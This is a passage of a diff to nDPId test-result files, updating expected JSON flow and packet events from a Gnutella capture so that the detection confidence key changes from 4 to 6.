-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":139889,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95716,"flow_last_seen":139781,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95893,"flow_last_seen":123936,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":146329,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95716,"flow_last_seen":243760,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95893,"flow_last_seen":251793,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1751,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":139889,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95716,"flow_last_seen":139781,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95893,"flow_last_seen":123936,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":146329,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95716,"flow_last_seen":243760,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287308,"flow_last_seen":287308,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":287308,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.210.81.59","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":287308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":287308,"pkt":"UlQAEjUCCAAn5uVZCABFAABpuTwAAIARzSsKAAIPVtJRO3AJGMoAVf5iR05EED+uAQFMQVEyUApVRFBdL+I1CXBbSWKeSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4201,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287308,"flow_last_seen":287308,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":287308,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.247.89.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -2638,7 +2638,7 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4664,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":288355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":288355,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ptwAAIAR2SwKAAIPpIQKGXAJvHoAJCauo68xAuqK3ib\/VZWObCGFAwABAAUAAADDglFLQA=="} 00529{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":288409,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":288409,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":288409,"pkt":"CAAn5uVZUlQAEjUCCABFwABUC3cAAH8BdMakhAoZCgACDwMDt94AAAAARQAAOKbcAAB\/EdosCgACD6SEChlwCbx6ACQmrqOvMQLqit4m\/1WVjmwhhQMAAQAFAAAAw4JRS0A="} 
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":288409,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.020679} +00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":288409,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.020679} 
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4671,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":2,"flow_last_seen":288490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"thread_ts_msec":288490,"pkt":"CAAn5uVZUlQAEjUCCABFAAFWC3sAAEARmwMk76IbCgACDx8ycAkBQkS1R05EAVjxAQF4nOspZwx09GAJCT7CpZrkwOGi8n6RtJH8bgYgs0hiW9ONsGMg5p3WqpuLoo8zgBVcnfQtZB+Iedtdp9LOYjtYQWfW2kzdvWBtapxB8+MOg5haScUNi6J3gJi3lqi\/LA88AdYWyh36SPMAiLl+mzr3RiMwU+Wl1qUOUbCCO23Lg\/aI7Qcxq8\/WpXmKHAWr3Trni72CMtgENwPxNnk1ELP8O9ujj6rqYCZf\/9tF0Qxg5rfJHncEwQps72h+nCrGBHYOk53MZwkFEHP75qiCGjVtsAKHjaaLovnBTlef5fpAiBHEPDXd3vqErCCIybgwIOiCojzEkcz3DYyACtiCIaJABiSYgIw7\/UoP0\/2ADIhDgAyI9zxYghx1GBkYGGL1H5kaMjGkSB359NKPs4AfAD6Dfz4="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4683,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":289961,"flow_last_seen":289961,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":289961,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4683,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":289961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":289961,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4bogAAIARxeoKAAIPe81+ZnAJFEkAJPn9btcxAoLvbJD\/ZQI2cb+qAwABAAUAAADDglFLQA=="} 
@@ -2648,7 +2648,7 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4701,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":291154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":291154,"pkt":"CAAn5uVZUlQAEjUCCABFAABKC5AAAEARIKNJWfkICgACD8XZcAkANp0565kxAgUhZoj\/+H2oSNwcAwEBABcAAADZxUlZ+Qi8AAAAAAAgAMOCUUtE05ynKA=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4702,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":3,"flow_last_seen":291154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":291154,"pkt":"UlQAEjUCCAAn5uVZCABFAABUghEAAIARahcKAAIPSVn5CHAJxdkAQIPAXS\/iNTECAGQaxPLpTglwD4ABACEAAAD5AHBpbmtmbG95ZADDAlFLRNOcpygDU0NQQAFaQIJQUkA="} 00567{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4821,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":115369,"flow_last_seen":287650,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":302977,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4821,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":302977,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4821,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":302977,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":311749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":311749,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0tpYAAIARiEUKAAIP1XgaVnAJdPoAIL2TR05EED\/KAQFUC1FLUlAGUk5BXS\/iNQlw"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":311750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":311750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0dUEAAIARISUKAAIPsKPnoHAJGMoAIHFJR05EED\/PAQFUC1FLUlAGUk5BXS\/iNQlw"} 